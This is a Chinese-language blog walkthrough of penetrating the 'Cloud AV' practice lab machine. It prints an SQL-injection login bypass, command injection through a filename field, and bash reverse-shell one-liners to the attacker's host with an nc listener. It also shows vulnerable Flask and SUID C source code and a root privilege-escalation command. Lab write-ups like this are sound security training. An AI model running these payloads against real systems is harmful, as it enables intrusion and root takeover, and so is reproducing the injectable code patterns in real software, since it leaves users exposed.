Cloud AV靶机

Cloud AV靶机渗透

arp-scan -l 扫描靶机IP地址

nmap -sV -Pn -A x.x.x.x 扫描端口

我们访问一下8080端口的web站点,可以看到要求我们输入验证码,通过几次万能密码的SQL注入尝试我们轻松突破了限制。

payload:1" or 1=1--

 

随后我们被跳转到了scan页面,给我们列出文件列表,提示我们选择一个进行扫描,估计此处存在命令执行问题。

 

我们先随便选择一个bash查看运行结果,经过了漫长的等待时间,对方终于给了我们响应,从响应中可以看到服务器端是执行了一次对该文件的病毒扫描,接着我们重新选择一个文件长度较小的hello,并测试一下是否可以执行任意命令。

输入 hello;pwd

可以看到相应信息中携带了物理路径,我们的命令被成功执行

在第一步的基础上,尝试利用该漏洞向我们的kali建立一个反向链接

 
  1. payload:hello;echo 'bash -i >& /dev/tcp/x.x.x.x/6767 0>&1'|bash

  2. kali端:nc -lvp 6767

反向连接建立成功

 

可以看到该web站点使用python语言编写,于是我们用pty创建一个功能健全的交互式shell,之后查看一下网站源码,审计一通除了已知的任意命令执行没有新的发现。

python -c "import pty;pty.spawn('/bin/sh');"


cat app.py
from flask import Flask, render_template, request, session
import sqlite3
import subprocess
import os
 
conn = sqlite3.connect('database.sql',check_same_thread = False)
c = conn.cursor()
 
app = Flask(__name__)
 
@app.route('/')
def index():
    return render_template('index.html')
 
@app.route('/login', methods=['POST'])
def login():
    password = request.form['password']
    if len(c.execute('select * from code where password="' + password + '"').fetchall()) > 0:
        session['logged_in'] = True
        return 'Redirecting to /scan. <meta http-equiv="refresh" content="0; url=/scan" />'
    else:
        return "WRONG INFORMATION"
 
@app.route('/scan')
def shop():
    if session.get('logged_in'):
        filelist = subprocess.Popen("ls -l /home/scanner/cloudav_app/samples", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.read()
        return render_template('scan.html',filelist=filelist)
    else:
        return '<meta http-equiv="refresh" content="0; url=/" />'
 
@app.route('/output', methods=['POST'])
def output():
    if session.get('logged_in'):
        filename = request.form['filename']
        scan_results = subprocess.Popen("clamscan "+filename, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.read()
        return "<pre>" + scan_results + "</pre>"
    else:
        return '<meta http-equiv="refresh" content="0; url=/" />'
 
if __name__ == "__main__":
    app.secret_key = os.urandom(12)
    app.run(host='0.0.0.0',port=8080, debug=True)
 

随后我又查看了目录下的其他文件,大部分都经过了加密,虽然有读权限但是没什么卵用……

随后我在上层目录发现了拥有root权限的更新程序和源码文件

查看一下update_cloudav的源码

#include <stdio.h>
 
int main(int argc, char *argv[])
{
char *freshclam="/usr/bin/freshclam";
 
if (argc < 2){
printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
return 1;
}
 
char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
sprintf(command, "%s %s", freshclam, argv[1]);
setgid(0);
setuid(0);
system(command);
return 0;
 
}

可以看到该更新程序被赋予了SUID,接收用户输入的参数并未作任何处理,我们可以通过管道链接一个正常参数执行我们想要的命令可以看到该更新程序被赋予了SUID,接收用户输入的参数并未作任何处理,我们可以通过管道链接一个正常参数执行我们想要的命令

直接反弹shell,提权成功。

./update_cloudav "--help|echo 'bash -i >& /dev/tcp/172.16.12.137/7777 0>&1'|bash"

 

这次练习让我认识到细心的重要性,最后一步提权卡了很久,原因是看到了源码中的setuid觉得可疑但是并没用深入探究。另外,在渗透过程中我进行了网站目录的扫描,发现了/console,但是却没用用到,可能是另外一种思路的突破口,等之后有别的师傅发wp再研究吧! 

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值